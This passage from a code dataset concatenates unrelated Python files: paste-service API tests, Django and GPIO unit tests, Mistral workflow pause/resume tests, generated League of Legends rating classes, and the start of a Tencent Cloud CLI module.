                'page_num': 0,
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE, json.loads(resp.data))

    def test_recent_pastes_no_results(self):
        resp = self.client.post(
            RecentPastesURI.uri(),
            data=json.dumps({
                'page_num': 0,
                'num_per_page': 5,
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertEqual([], json.loads(resp.data)['pastes'])

        resp = self.client.post(
            RecentPastesURI.uri(),
            data=json.dumps({
                'page_num': 3,
                'num_per_page': 5,
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertEqual([], json.loads(resp.data)['pastes'])

    def test_recent_pastes_results(self):
        pastes = []
        for i in range(15):
            with mock.patch.object(time, 'time', return_value=time.time() + random.randint(-10000, 10000)):
                pastes.append(util.testing.PasteFactory.generate(expiry_time=None))

        # list() so the mapped results can be sliced below (map returns an
        # iterator on Python 3).
        recent_pastes_sorted = list(map(
            lambda paste: paste.as_dict(),
            sorted(pastes, key=lambda paste: paste.post_time, reverse=True),
        ))

        resp = self.client.post(
            RecentPastesURI.uri(),
            data=json.dumps({
                'page_num': 0,
                'num_per_page': 5,
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertEqual(recent_pastes_sorted[0:5], json.loads(resp.data)['pastes'])

    def test_top_pastes_invalid(self):
        resp = self.client.post(
            TopPastesURI.uri(),
            data=json.dumps({}),
            content_type='application/json',
        )

        self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE, json.loads(resp.data))

        resp = self.client.post(
            TopPastesURI.uri(),
            data=json.dumps({
                'page_num': 0,
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE_CODE, resp.status_code)
        self.assertEqual(constants.api.INCOMPLETE_PARAMS_FAILURE, json.loads(resp.data))

    def test_top_pastes_no_results(self):
        resp = self.client.post(
            TopPastesURI.uri(),
            data=json.dumps({
                'page_num': 0,
                'num_per_page': 5,
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertEqual([], json.loads(resp.data)['pastes'])

        resp = self.client.post(
            TopPastesURI.uri(),
            data=json.dumps({
                'page_num': 3,
                'num_per_page': 5,
            }),
            content_type='application/json',
        )

        self.assertEqual(constants.api.SUCCESS_CODE, resp.status_code)
        self.assertEqual([], json.loads(resp.data)['pastes'])

    def test_recent_pastes_server_error(self):
        with mock.patch.object(database.paste, 'get_recent_pastes', side_effect=SQLAlchemyError):
            resp = self.client.post(
                RecentPastesURI.uri(),
                data=json.dumps({
                    'page_num': 0,
                    'num_per_page': 5,
                }),
                content_type='application/json',
            )

            self.assertEqual(resp.status_code, constants.api.UNDEFINED_FAILURE_CODE)
            self.assertEqual(json.loads(resp.data), constants.api.UNDEFINED_FAILURE)

    def test_top_pastes_results(self):
        pastes = [util.testing.PasteFactory.generate() for i in range(15)]
        for paste in pastes:
            for i in range(random.randint(0, 50)):
                database.paste.increment_paste_views(paste.paste_id)

        for page_num in range(3):
            resp = self.client.post(
                TopPastesURI.uri(),
                data=json.dumps({
                    'page_num': page_num,
                    'num_per_page': 5,
                }),
                content_type='application/json',
            )

            self.assertEqual(5, len(json.loads(resp.data)['pastes']))
            for i in range(4):
                self.assertGreaterEqual(
                    json.loads(resp.data)['pastes'][i]['views'],
                    json.loads(resp.data)['pastes'][i + 1]['views']
                )

        resp = self.client.post(
            TopPastesURI.uri(),
            data=json.dumps({
                'page_num': 3,
                'num_per_page': 5,
            }),
            content_type='application/json',
        )

        self.assertEqual([], json.loads(resp.data)['pastes'])

    def test_top_pastes_server_error(self):
        with mock.patch.object(database.paste, 'get_top_pastes', side_effect=SQLAlchemyError):
            resp = self.client.post(
                TopPastesURI.uri(),
                data=json.dumps({
                    'page_num': 0,
                    'num_per_page': 5,
                }),
                content_type='application/json',
            )

            self.assertEqual(resp.status_code, constants.api.UNDEFINED_FAILURE_CODE)
            self.assertEqual(json.loads(resp.data), constants.api.UNDEFINED_FAILURE)
bc1003924cb83de10777fd181c8b8eb1ed8bd3f4 | 187 | py | Python | request_token/compat.py | timomeara/django-request-token | cdf549e0d426eefe60e292be5d6cf8f2bc425f43 | [
"MIT"
] | 41 | 2016-07-11T05:01:11.000Z | 2021-10-01T05:28:35.000Z | request_token/compat.py | timomeara/django-request-token | cdf549e0d426eefe60e292be5d6cf8f2bc425f43 | [
"MIT"
] | 39 | 2016-10-20T16:44:15.000Z | 2021-08-09T22:17:00.000Z | request_token/compat.py | timomeara/django-request-token | cdf549e0d426eefe60e292be5d6cf8f2bc425f43 | [
"MIT"
] | 25 | 2016-10-06T23:54:52.000Z | 2021-06-23T14:59:23.000Z | # handle Django 3.0/3.1 JSONField
try:
    from django.db.models import JSONField  # noqa: F401
except ImportError:
    from django.contrib.postgres.fields import JSONField  # noqa: F401
cb3ab4ef049d25683e324c36b6e07c76f73981a1 | 1,800 | py | Python | frontdesk/tests/test_models.py | brunousml/inbox | 76e12c2aa33e119901e98c3e0b980951f30f8418 | [
"BSD-2-Clause"
] | 1 | 2019-03-16T05:05:54.000Z | 2019-03-16T05:05:54.000Z | frontdesk/tests/test_models.py | brunousml/inbox | 76e12c2aa33e119901e98c3e0b980951f30f8418 | [
"BSD-2-Clause"
] | null | null | null | frontdesk/tests/test_models.py | brunousml/inbox | 76e12c2aa33e119901e98c3e0b980951f30f8418 | [
"BSD-2-Clause"
] | null | null | null | from django.test import TestCase
from . import modelfactories


class PackageMemberTests(TestCase):
    def test_type_guessing_for_xml_members(self):
        member = modelfactories.PackageMemberFactory(
            name='0004-2730-aem-60-4/0004-2730-aem-60-4-0407.xml')

        self.assertEqual('application/xml', member.guess_type())

    def test_type_guessing_for_pdf_members(self):
        member = modelfactories.PackageMemberFactory(
            name='0004-2730-aem-60-4/0004-2730-aem-60-4-0299.pdf')

        self.assertEqual('application/pdf', member.guess_type())

    def test_type_guessing_for_jpg_members(self):
        member = modelfactories.PackageMemberFactory(
            name='0004-2730-aem-60-4/0004-2730-aem-60-4-0367-gf01.jpg')

        self.assertEqual('image/jpeg', member.guess_type())

    def test_type_guessing_for_jpeg_members(self):
        member = modelfactories.PackageMemberFactory(
            name='0004-2730-aem-60-4/0004-2730-aem-60-4-0367-gf01.jpeg')

        self.assertEqual('image/jpeg', member.guess_type())

    def test_type_guessing_for_tif_members(self):
        member = modelfactories.PackageMemberFactory(
            name='0004-2730-aem-60-4/0004-2730-aem-60-4-0367-gf01.tif')

        self.assertEqual('image/tiff', member.guess_type())

    def test_type_guessing_for_tiff_members(self):
        member = modelfactories.PackageMemberFactory(
            name='0004-2730-aem-60-4/0004-2730-aem-60-4-0367-gf01.tiff')

        self.assertEqual('image/tiff', member.guess_type())

    def test_type_guessing_for_members_without_file_extension(self):
        member = modelfactories.PackageMemberFactory(
            name='0004-2730-aem-60-4/0004-2730-aem-60-4-0367-gf01')

        self.assertEqual(None, member.guess_type())
cb579fcab4a96c2759900adfb247c537ba93a7c8 | 1,713 | py | Python | tests/shared/test_gpio_callbacks.py | HazardDede/pnp | 469ca17254dcca1a4eefe0dc5ac574692a9ab38e | [
"MIT"
] | 4 | 2018-10-07T11:32:00.000Z | 2019-04-23T09:34:23.000Z | tests/shared/test_gpio_callbacks.py | HazardDede/pnp | 469ca17254dcca1a4eefe0dc5ac574692a9ab38e | [
"MIT"
] | null | null | null | tests/shared/test_gpio_callbacks.py | HazardDede/pnp | 469ca17254dcca1a4eefe0dc5ac574692a9ab38e | [
"MIT"
] | 1 | 2019-08-12T19:56:10.000Z | 2019-08-12T19:56:10.000Z | import pnp.shared.gpio as gpio
from pnp.utils import parse_duration_literal


def test_callback_from_str():
    res = gpio.Callback.from_str("2")
    assert isinstance(res, gpio.RisingCallback)
    assert res.gpio_pin == 2

    res = gpio.Callback.from_str("2", default=gpio.CONST_FALLING)
    assert isinstance(res, gpio.FallingCallback)
    assert res.gpio_pin == 2

    res = gpio.Callback.from_str("2:rising", default=gpio.CONST_FALLING)
    assert isinstance(res, gpio.RisingCallback)
    assert res.gpio_pin == 2

    res = gpio.Callback.from_str("2:falling", default=gpio.CONST_RISING)
    assert isinstance(res, gpio.FallingCallback)
    assert res.gpio_pin == 2

    res = gpio.Callback.from_str("2:switch", default=gpio.CONST_RISING)
    assert isinstance(res, gpio.SwitchCallback)
    assert res.gpio_pin == 2
    assert res.delay == gpio.SwitchCallback.BOUNCE_DEFAULT

    res = gpio.Callback.from_str("2:switch(999)", default=gpio.CONST_RISING)
    assert isinstance(res, gpio.SwitchCallback)
    assert res.gpio_pin == 2
    assert res.delay == 999

    try:
        gpio.Callback.from_str("2:switch()", default=gpio.CONST_RISING)
    except ValueError:
        pass

    res = gpio.Callback.from_str("2:motion", default=gpio.CONST_RISING)
    assert isinstance(res, gpio.MotionCallback)
    assert res.gpio_pin == 2
    assert res.delay == parse_duration_literal(gpio.MotionCallback.DELAY_DEFAULT)

    res = gpio.Callback.from_str("2:motion(2m)", default=gpio.CONST_RISING)
    assert isinstance(res, gpio.MotionCallback)
    assert res.gpio_pin == 2
    assert res.delay == 120

    try:
        gpio.Callback.from_str("2:motion()", default=gpio.CONST_RISING)
    except ValueError:
        pass
cb5df1abd42594112c7e855f4eed191cf5ddb69e | 10,715 | py | Python | mistral/tests/unit/engine/test_task_pause_resume.py | soda-research/mistral | 550a3de9c2defc7ce26336cb705d9c8d87bbaddd | [
"Apache-2.0"
] | 205 | 2015-06-21T11:51:47.000Z | 2022-03-05T04:00:04.000Z | mistral/tests/unit/engine/test_task_pause_resume.py | soda-research/mistral | 550a3de9c2defc7ce26336cb705d9c8d87bbaddd | [
"Apache-2.0"
] | 21 | 2015-04-14T22:41:53.000Z | 2019-02-20T09:30:10.000Z | mistral/tests/unit/engine/test_task_pause_resume.py | soda-research/mistral | 550a3de9c2defc7ce26336cb705d9c8d87bbaddd | [
"Apache-2.0"
] | 110 | 2015-06-14T03:34:38.000Z | 2021-11-11T12:12:56.000Z | # Copyright 2015 - StackStorm, Inc.
# Copyright 2016 - Brocade Communications Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mistral.db.v2 import api as db_api
from mistral.services import workflows as wf_service
from mistral.tests.unit.engine import base
from mistral.workflow import states
from mistral_lib import actions as ml_actions
class TaskPauseResumeTest(base.EngineTestCase):
    def test_pause_resume_action_ex(self):
        workflow = """
        version: '2.0'

        wf:
          tasks:
            task1:
              action: std.async_noop
              on-success:
                - task2

            task2:
              action: std.noop
        """

        wf_service.create_workflows(workflow)

        wf_ex = self.engine.start_workflow('wf')

        self.await_workflow_state(wf_ex.id, states.RUNNING)

        with db_api.transaction():
            wf_execs = db_api.get_workflow_executions()

            wf_ex = self._assert_single_item(wf_execs, name='wf')

            task_execs = wf_ex.task_executions

            task_1_ex = self._assert_single_item(
                wf_ex.task_executions,
                name='task1'
            )

            task_1_action_exs = db_api.get_action_executions(
                task_execution_id=task_1_ex.id
            )

            self.assertEqual(states.RUNNING, wf_ex.state)
            self.assertEqual(1, len(task_execs))
            self.assertEqual(states.RUNNING, task_1_ex.state)
            self.assertEqual(1, len(task_1_action_exs))
            self.assertEqual(states.RUNNING, task_1_action_exs[0].state)

        # Pause the action execution of task 1.
        self.engine.on_action_update(task_1_action_exs[0].id, states.PAUSED)

        self.await_task_paused(task_1_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            task_execs = wf_ex.task_executions

            task_1_ex = self._assert_single_item(
                wf_ex.task_executions,
                name='task1'
            )

            task_1_action_exs = db_api.get_action_executions(
                task_execution_id=task_1_ex.id
            )

            self.assertEqual(states.PAUSED, wf_ex.state)
            self.assertEqual(1, len(task_execs))
            self.assertEqual(states.PAUSED, task_1_ex.state)
            self.assertEqual(1, len(task_1_action_exs))
            self.assertEqual(states.PAUSED, task_1_action_exs[0].state)

        # Resume the action execution of task 1.
        self.engine.on_action_update(task_1_action_exs[0].id, states.RUNNING)

        self.await_task_running(task_1_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            task_1_ex = self._assert_single_item(
                wf_ex.task_executions,
                name='task1'
            )

            task_1_action_exs = db_api.get_action_executions(
                task_execution_id=task_1_ex.id
            )

            self.assertEqual(states.RUNNING, wf_ex.state)
            self.assertEqual(1, len(task_execs))
            self.assertEqual(states.RUNNING, task_1_ex.state)
            self.assertEqual(1, len(task_1_action_exs))
            self.assertEqual(states.RUNNING, task_1_action_exs[0].state)

        # Complete action execution of task 1.
        self.engine.on_action_complete(
            task_1_action_exs[0].id,
            ml_actions.Result(data={'result': 'foobar'})
        )

        # Wait for the workflow execution to complete.
        self.await_workflow_success(wf_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            task_execs = wf_ex.task_executions

            task_1_ex = self._assert_single_item(task_execs, name='task1')

            task_1_action_exs = db_api.get_action_executions(
                task_execution_id=task_1_ex.id
            )

            task_2_ex = self._assert_single_item(task_execs, name='task2')

            self.assertEqual(states.SUCCESS, wf_ex.state)
            self.assertEqual(2, len(task_execs))
            self.assertEqual(states.SUCCESS, task_1_ex.state)
            self.assertEqual(1, len(task_1_action_exs))
            self.assertEqual(states.SUCCESS, task_1_action_exs[0].state)
            self.assertEqual(states.SUCCESS, task_2_ex.state)

    def test_pause_resume_action_ex_with_items_task(self):
        workflow = """
        version: '2.0'

        wf:
          tasks:
            task1:
              with-items: i in <% range(3) %>
              action: std.async_noop
              on-success:
                - task2

            task2:
              action: std.noop
        """

        wf_service.create_workflows(workflow)

        wf_ex = self.engine.start_workflow('wf')

        self.await_workflow_state(wf_ex.id, states.RUNNING)

        with db_api.transaction():
            wf_execs = db_api.get_workflow_executions()

            wf_ex = self._assert_single_item(wf_execs, name='wf')

            task_execs = wf_ex.task_executions

            task_1_ex = self._assert_single_item(
                wf_ex.task_executions,
                name='task1'
            )

            task_1_action_exs = sorted(
                db_api.get_action_executions(task_execution_id=task_1_ex.id),
                key=lambda x: x['runtime_context']['index']
            )

            self.assertEqual(states.RUNNING, wf_ex.state)
            self.assertEqual(1, len(task_execs))
            self.assertEqual(states.RUNNING, task_1_ex.state)
            self.assertEqual(3, len(task_1_action_exs))
            self.assertEqual(states.RUNNING, task_1_action_exs[0].state)
            self.assertEqual(states.RUNNING, task_1_action_exs[1].state)
            self.assertEqual(states.RUNNING, task_1_action_exs[2].state)

        # Pause the 1st action execution of task 1.
        self.engine.on_action_update(task_1_action_exs[0].id, states.PAUSED)

        self.await_task_paused(task_1_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            task_execs = wf_ex.task_executions

            task_1_ex = self._assert_single_item(
                wf_ex.task_executions,
                name='task1'
            )

            task_1_action_exs = sorted(
                db_api.get_action_executions(task_execution_id=task_1_ex.id),
                key=lambda x: x['runtime_context']['index']
            )

            self.assertEqual(states.PAUSED, wf_ex.state)
            self.assertEqual(1, len(task_execs))
            self.assertEqual(states.PAUSED, task_1_ex.state)
            self.assertEqual(3, len(task_1_action_exs))
            self.assertEqual(states.PAUSED, task_1_action_exs[0].state)
            self.assertEqual(states.RUNNING, task_1_action_exs[1].state)
            self.assertEqual(states.RUNNING, task_1_action_exs[2].state)

        # Complete 2nd and 3rd action executions of task 1.
        self.engine.on_action_complete(
            task_1_action_exs[1].id,
            ml_actions.Result(data={'result': 'two'})
        )

        self.engine.on_action_complete(
            task_1_action_exs[2].id,
            ml_actions.Result(data={'result': 'three'})
        )

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            task_execs = wf_ex.task_executions

            task_1_ex = self._assert_single_item(
                wf_ex.task_executions,
                name='task1'
            )

            task_1_action_exs = sorted(
                db_api.get_action_executions(task_execution_id=task_1_ex.id),
                key=lambda x: x['runtime_context']['index']
            )

            self.assertEqual(states.PAUSED, wf_ex.state)
            self.assertEqual(1, len(task_execs))
            self.assertEqual(states.PAUSED, task_1_ex.state)
            self.assertEqual(3, len(task_1_action_exs))
            self.assertEqual(states.PAUSED, task_1_action_exs[0].state)
            self.assertEqual(states.SUCCESS, task_1_action_exs[1].state)
            self.assertEqual(states.SUCCESS, task_1_action_exs[2].state)

        # Resume the 1st action execution of task 1.
        self.engine.on_action_update(task_1_action_exs[0].id, states.RUNNING)

        self.await_task_running(task_1_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            task_1_ex = self._assert_single_item(
                wf_ex.task_executions,
                name='task1'
            )

            task_1_action_exs = sorted(
                db_api.get_action_executions(task_execution_id=task_1_ex.id),
                key=lambda x: x['runtime_context']['index']
            )

            self.assertEqual(states.RUNNING, wf_ex.state)
            self.assertEqual(1, len(task_execs))
            self.assertEqual(states.RUNNING, task_1_ex.state)
            self.assertEqual(3, len(task_1_action_exs))
            self.assertEqual(states.RUNNING, task_1_action_exs[0].state)
            self.assertEqual(states.SUCCESS, task_1_action_exs[1].state)
            self.assertEqual(states.SUCCESS, task_1_action_exs[2].state)

        # Complete the 1st action execution of task 1.
        self.engine.on_action_complete(
            task_1_action_exs[0].id,
            ml_actions.Result(data={'result': 'foobar'})
        )

        # Wait for the workflow execution to complete.
        self.await_workflow_success(wf_ex.id)

        with db_api.transaction():
            wf_ex = db_api.get_workflow_execution(wf_ex.id)

            task_execs = wf_ex.task_executions

            task_1_ex = self._assert_single_item(task_execs, name='task1')

            task_1_action_exs = sorted(
                db_api.get_action_executions(task_execution_id=task_1_ex.id),
                key=lambda x: x['runtime_context']['index']
            )

            task_2_ex = self._assert_single_item(task_execs, name='task2')

            self.assertEqual(states.SUCCESS, wf_ex.state)
            self.assertEqual(2, len(task_execs))
            self.assertEqual(states.SUCCESS, task_1_ex.state)
            self.assertEqual(3, len(task_1_action_exs))
            self.assertEqual(states.SUCCESS, task_1_action_exs[0].state)
            self.assertEqual(states.SUCCESS, task_1_action_exs[1].state)
            self.assertEqual(states.SUCCESS, task_1_action_exs[2].state)
            self.assertEqual(states.SUCCESS, task_2_ex.state)
cb7c2cf66ef31ad1b7dbbeeec1251480ef647019 | 6,545 | py | Python | loldib/getratings/models/NA/na_rumble/na_rumble_sup.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_rumble/na_rumble_sup.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_rumble/na_rumble_sup.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings


class NA_Rumble_Sup_Aatrox(Ratings):
    pass

class NA_Rumble_Sup_Ahri(Ratings):
    pass

class NA_Rumble_Sup_Akali(Ratings):
    pass

class NA_Rumble_Sup_Alistar(Ratings):
    pass

class NA_Rumble_Sup_Amumu(Ratings):
    pass

class NA_Rumble_Sup_Anivia(Ratings):
    pass

class NA_Rumble_Sup_Annie(Ratings):
    pass

class NA_Rumble_Sup_Ashe(Ratings):
    pass

class NA_Rumble_Sup_AurelionSol(Ratings):
    pass

class NA_Rumble_Sup_Azir(Ratings):
    pass

class NA_Rumble_Sup_Bard(Ratings):
    pass

class NA_Rumble_Sup_Blitzcrank(Ratings):
    pass

class NA_Rumble_Sup_Brand(Ratings):
    pass

class NA_Rumble_Sup_Braum(Ratings):
    pass

class NA_Rumble_Sup_Caitlyn(Ratings):
    pass

class NA_Rumble_Sup_Camille(Ratings):
    pass

class NA_Rumble_Sup_Cassiopeia(Ratings):
    pass

class NA_Rumble_Sup_Chogath(Ratings):
    pass

class NA_Rumble_Sup_Corki(Ratings):
    pass

class NA_Rumble_Sup_Darius(Ratings):
    pass

class NA_Rumble_Sup_Diana(Ratings):
    pass

class NA_Rumble_Sup_Draven(Ratings):
    pass

class NA_Rumble_Sup_DrMundo(Ratings):
    pass

class NA_Rumble_Sup_Ekko(Ratings):
    pass

class NA_Rumble_Sup_Elise(Ratings):
    pass

class NA_Rumble_Sup_Evelynn(Ratings):
    pass

class NA_Rumble_Sup_Ezreal(Ratings):
    pass

class NA_Rumble_Sup_Fiddlesticks(Ratings):
    pass

class NA_Rumble_Sup_Fiora(Ratings):
    pass

class NA_Rumble_Sup_Fizz(Ratings):
    pass

class NA_Rumble_Sup_Galio(Ratings):
    pass

class NA_Rumble_Sup_Gangplank(Ratings):
    pass

class NA_Rumble_Sup_Garen(Ratings):
    pass

class NA_Rumble_Sup_Gnar(Ratings):
    pass

class NA_Rumble_Sup_Gragas(Ratings):
    pass

class NA_Rumble_Sup_Graves(Ratings):
    pass

class NA_Rumble_Sup_Hecarim(Ratings):
    pass

class NA_Rumble_Sup_Heimerdinger(Ratings):
    pass

class NA_Rumble_Sup_Illaoi(Ratings):
    pass

class NA_Rumble_Sup_Irelia(Ratings):
    pass

class NA_Rumble_Sup_Ivern(Ratings):
    pass

class NA_Rumble_Sup_Janna(Ratings):
    pass

class NA_Rumble_Sup_JarvanIV(Ratings):
    pass

class NA_Rumble_Sup_Jax(Ratings):
    pass

class NA_Rumble_Sup_Jayce(Ratings):
    pass

class NA_Rumble_Sup_Jhin(Ratings):
    pass

class NA_Rumble_Sup_Jinx(Ratings):
    pass

class NA_Rumble_Sup_Kalista(Ratings):
    pass

class NA_Rumble_Sup_Karma(Ratings):
    pass

class NA_Rumble_Sup_Karthus(Ratings):
    pass

class NA_Rumble_Sup_Kassadin(Ratings):
    pass

class NA_Rumble_Sup_Katarina(Ratings):
    pass

class NA_Rumble_Sup_Kayle(Ratings):
    pass

class NA_Rumble_Sup_Kayn(Ratings):
    pass

class NA_Rumble_Sup_Kennen(Ratings):
    pass

class NA_Rumble_Sup_Khazix(Ratings):
    pass

class NA_Rumble_Sup_Kindred(Ratings):
    pass

class NA_Rumble_Sup_Kled(Ratings):
    pass

class NA_Rumble_Sup_KogMaw(Ratings):
    pass

class NA_Rumble_Sup_Leblanc(Ratings):
    pass

class NA_Rumble_Sup_LeeSin(Ratings):
    pass

class NA_Rumble_Sup_Leona(Ratings):
    pass

class NA_Rumble_Sup_Lissandra(Ratings):
    pass

class NA_Rumble_Sup_Lucian(Ratings):
    pass

class NA_Rumble_Sup_Lulu(Ratings):
    pass

class NA_Rumble_Sup_Lux(Ratings):
    pass

class NA_Rumble_Sup_Malphite(Ratings):
    pass

class NA_Rumble_Sup_Malzahar(Ratings):
    pass

class NA_Rumble_Sup_Maokai(Ratings):
    pass

class NA_Rumble_Sup_MasterYi(Ratings):
    pass

class NA_Rumble_Sup_MissFortune(Ratings):
    pass

class NA_Rumble_Sup_MonkeyKing(Ratings):
    pass
class NA_Rumble_Sup_Mordekaiser(Ratings):
pass
class NA_Rumble_Sup_Morgana(Ratings):
pass
class NA_Rumble_Sup_Nami(Ratings):
pass
class NA_Rumble_Sup_Nasus(Ratings):
pass
class NA_Rumble_Sup_Nautilus(Ratings):
pass
class NA_Rumble_Sup_Nidalee(Ratings):
pass
class NA_Rumble_Sup_Nocturne(Ratings):
pass
class NA_Rumble_Sup_Nunu(Ratings):
pass
class NA_Rumble_Sup_Olaf(Ratings):
pass
class NA_Rumble_Sup_Orianna(Ratings):
pass
class NA_Rumble_Sup_Ornn(Ratings):
pass
class NA_Rumble_Sup_Pantheon(Ratings):
pass
class NA_Rumble_Sup_Poppy(Ratings):
pass
class NA_Rumble_Sup_Quinn(Ratings):
pass
class NA_Rumble_Sup_Rakan(Ratings):
pass
class NA_Rumble_Sup_Rammus(Ratings):
pass
class NA_Rumble_Sup_RekSai(Ratings):
pass
class NA_Rumble_Sup_Renekton(Ratings):
pass
class NA_Rumble_Sup_Rengar(Ratings):
pass
class NA_Rumble_Sup_Riven(Ratings):
pass
class NA_Rumble_Sup_Rumble(Ratings):
pass
class NA_Rumble_Sup_Ryze(Ratings):
pass
class NA_Rumble_Sup_Sejuani(Ratings):
pass
class NA_Rumble_Sup_Shaco(Ratings):
pass
class NA_Rumble_Sup_Shen(Ratings):
pass
class NA_Rumble_Sup_Shyvana(Ratings):
pass
class NA_Rumble_Sup_Singed(Ratings):
pass
class NA_Rumble_Sup_Sion(Ratings):
pass
class NA_Rumble_Sup_Sivir(Ratings):
pass
class NA_Rumble_Sup_Skarner(Ratings):
pass
class NA_Rumble_Sup_Sona(Ratings):
pass
class NA_Rumble_Sup_Soraka(Ratings):
pass
class NA_Rumble_Sup_Swain(Ratings):
pass
class NA_Rumble_Sup_Syndra(Ratings):
pass
class NA_Rumble_Sup_TahmKench(Ratings):
pass
class NA_Rumble_Sup_Taliyah(Ratings):
pass
class NA_Rumble_Sup_Talon(Ratings):
pass
class NA_Rumble_Sup_Taric(Ratings):
pass
class NA_Rumble_Sup_Teemo(Ratings):
pass
class NA_Rumble_Sup_Thresh(Ratings):
pass
class NA_Rumble_Sup_Tristana(Ratings):
pass
class NA_Rumble_Sup_Trundle(Ratings):
pass
class NA_Rumble_Sup_Tryndamere(Ratings):
pass
class NA_Rumble_Sup_TwistedFate(Ratings):
pass
class NA_Rumble_Sup_Twitch(Ratings):
pass
class NA_Rumble_Sup_Udyr(Ratings):
pass
class NA_Rumble_Sup_Urgot(Ratings):
pass
class NA_Rumble_Sup_Varus(Ratings):
pass
class NA_Rumble_Sup_Vayne(Ratings):
pass
class NA_Rumble_Sup_Veigar(Ratings):
pass
class NA_Rumble_Sup_Velkoz(Ratings):
pass
class NA_Rumble_Sup_Vi(Ratings):
pass
class NA_Rumble_Sup_Viktor(Ratings):
pass
class NA_Rumble_Sup_Vladimir(Ratings):
pass
class NA_Rumble_Sup_Volibear(Ratings):
pass
class NA_Rumble_Sup_Warwick(Ratings):
pass
class NA_Rumble_Sup_Xayah(Ratings):
pass
class NA_Rumble_Sup_Xerath(Ratings):
pass
class NA_Rumble_Sup_XinZhao(Ratings):
pass
class NA_Rumble_Sup_Yasuo(Ratings):
pass
class NA_Rumble_Sup_Yorick(Ratings):
pass
class NA_Rumble_Sup_Zac(Ratings):
pass
class NA_Rumble_Sup_Zed(Ratings):
pass
class NA_Rumble_Sup_Ziggs(Ratings):
pass
class NA_Rumble_Sup_Zilean(Ratings):
pass
class NA_Rumble_Sup_Zyra(Ratings):
pass
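
The file above is pure generated boilerplate: one empty `Ratings` subclass per champion. As a minimal sketch (using a stand-in `Ratings` base class and a truncated champion list, since the real `getratings.models.ratings` package is not available here), the same family of classes could be produced dynamically with the three-argument form of `type()`:

```python
# Stand-in base class; the real one lives in getratings.models.ratings.
class Ratings:
    pass

# Truncated list for illustration; the generated file covers every champion.
CHAMPIONS = ["Aatrox", "Ahri", "Akali"]

# Build one empty subclass per champion, mirroring the generated file:
# type(name, bases, namespace) creates a class object at runtime.
generated = {
    name: type(f"NA_Rumble_Sup_{name}", (Ratings,), {})
    for name in CHAMPIONS
}

assert issubclass(generated["Ahri"], Ratings)
assert generated["Aatrox"].__name__ == "NA_Rumble_Sup_Aatrox"
```

The code-generation approach used in the repo keeps every class importable by name, which dynamic creation would not provide without extra `globals()` registration; that is a plausible reason the file is written out explicitly.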
1db1db6f0dcf317d59425158a86e7cf4dd2ec544 | 96,172 | py | Python | tccli/services/cvm/cvm_client.py | bopopescu/tencentcloud-cli-intl-en | e6317252557095dd10018226244e636daa4a3c67 | ["Apache-2.0"] | # -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli.nice_command import NiceCommand
import tccli.error_msg as ErrorMsg
import tccli.help_template as HelpTemplate
from tccli import __version__
from tccli.utils import Utils
from tccli.configure import Configure
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.cvm.v20170312 import cvm_client as cvm_client_v20170312
from tencentcloud.cvm.v20170312 import models as models_v20170312
from tccli.services.cvm import v20170312
from tccli.services.cvm.v20170312 import help as v20170312_help
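
The functions below resolve the SDK client and model modules through `CLIENT_MAP` and `MODELS_MAP`, keyed by API version (the maps themselves are defined later in the file, outside this excerpt). A minimal sketch of that version-dispatch pattern, with hypothetical stand-in classes in place of the real `tencentcloud.cvm.v20170312` modules:

```python
# Hypothetical stand-ins; the real maps point at the versioned
# tencentcloud client and models modules, e.g. cvm_client_v20170312.
class ClientV20170312:
    name = "cvm_client_v20170312"

class ModelsV20170312:
    name = "models_v20170312"

CLIENT_MAP = {"v20170312": ClientV20170312}
MODELS_MAP = {"v20170312": ModelsV20170312}

def resolve(version):
    # Dict lookup keyed on version string: supporting a new API
    # version means adding one entry to each map, nothing else.
    return CLIENT_MAP[version], MODELS_MAP[version]

client_mod, models_mod = resolve("v20170312")
assert client_mod.name == "cvm_client_v20170312"
assert models_mod.name == "models_v20170312"
```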
def doDescribeImageQuota(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeImageQuota", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
